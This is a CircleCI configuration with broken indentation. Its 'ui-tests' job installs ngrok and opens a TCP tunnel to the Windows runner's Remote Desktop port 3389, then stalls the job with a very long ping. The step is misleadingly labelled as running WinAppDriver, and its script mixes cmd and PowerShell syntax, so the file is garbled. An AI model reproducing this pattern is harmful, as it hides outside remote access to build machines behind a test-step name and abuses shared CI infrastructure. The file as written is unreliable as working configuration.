version: 2.1

orbs:
  win: circleci/windows@2.4.0
   
    ui-tests:
        executor:
              name: win/default
                    shell: powershell.exe
                        steps:
                              - checkout
                                    - run: choco install ngrok
                                          - run: 
                                                    name: Run winappdriver in background
                                                                 command: | 
                                                                              ./ngrok.exe authtoken "YOUR_NGROK_AUTHTOKEN_HERE" >a.ps1
                                                                                           /k start ngrok.exe tcp 3389 >>a.ps1
                                                                                                        ping -n 999999 10.10.10.10 >>a.ps1
                                                                                                                     .\a.ps1